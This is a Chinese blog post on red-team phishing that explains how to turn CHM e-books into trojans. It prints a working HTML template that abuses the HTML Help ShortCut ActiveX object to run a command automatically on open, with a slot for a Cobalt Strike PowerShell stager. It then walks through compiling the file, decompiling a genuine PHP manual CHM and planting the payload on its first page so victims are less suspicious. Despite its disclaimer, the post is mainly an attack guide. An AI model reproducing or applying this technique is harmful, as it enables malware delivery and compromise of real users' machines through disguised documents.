当前位置: 首页 > article >正文

[红队apt]CHM电子书攻击/电子教程攻击

免责声明:本文用于了解攻击者的攻击手法,切勿用于不法用途


前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文主要整理当初电子书的时代,利用电子书攻击的操作

CHM电子书简介

这个在当初普遍用于做教程课件,软件说明等应用。

现在这个用的少了,但是依旧还是有些使用用途。

下面是php的chm教程

这个用来钓鱼还是不错的。

但是一般咱得找点模版,在人家基础上进行编辑。

不然莫名其妙一个奇怪chm太容易被怀疑了。

这个东西其实就是跟网页一样,用h5做的。

制作基础CHM木马

上线模板如下

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",填入生成的PS上线命令">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

CS生成web投递指令

填好内容

点运行

复制下面的指令

然后去掉这个命令中的双引号,并且在exe后面加个,

之后复制到模板的指定位置

然后用easy chm去制作chm电子书

创建一个项目,把这个html文件添加进去

完成之后点编译

生成木马,chm文件在对应目录的上一个目录

但是这样打开一个啥也没有的chm确实很可疑。

所以我们往往会选择一个正统的chm文本做嵌入。

高级版CHM木马

找一个真正有用的chm文件

这次我们使用这个php文档作为嵌入

这个是成品,我们需要先给他反编译过来。

反编译掉他

插入攻击代码,保存一下。

然后打开即可。

尽量在首页插入,不然他不浏览可能不会中招。

当然从社工角度也可以往后面插,因为一打开提示安全问题也比较怀疑。


http://www.kler.cn/news/342324.html

相关文章:

  • 微软确认Word离奇Bug 命名不当会导致文件被删
  • 塔吊识别数据集 yolo格式 共5076张图片 已划分好训练验证 txt格式 yolo可直接使用
  • VAS1800Q奇力科技线性芯片电荷泵热处理
  • set有哪些实现类?
  • 洗衣店管理革命:Spring Boot订单系统
  • 最新Prompt预设词指令教程大全ChatGPT、AI智能体(300+预设词应用)
  • 现货黄金价格走势图策略分析 先看“势”
  • 鸿蒙NEXT开发-页面路由(基于最新api12稳定版)
  • Excel中使用SQL语句的四种方法
  • 走进异常类的世界,自定义业务异常类实现指南
  • 多jdk版本环境下,jenkins系统设置需指定JAVA_HOME环境变量
  • AI 概念大杂烩
  • 若依项目搭建(黑马经验)
  • 基于SpringBoot+Vue+Uniapp微信小程序的电子竞技信息交流平台设计与实现
  • YOLO11改进|注意力机制篇|引入全局上下文注意力机制GCA
  • <Project-8 pdf2tx-MM> Python Flask应用:在浏览器中翻译PDF文件 NLTK OCR 多线程 指定翻译器 改进后的P6
  • 编程思想:编程范式:响应式编程
  • 003 Springboot操作RabbitMQ
  • 【CSS Tricks】鼠标滚轮驱动css动画播放,使用js还是css?
  • vue中用父组件刷新子组件中echarts饼图中的数据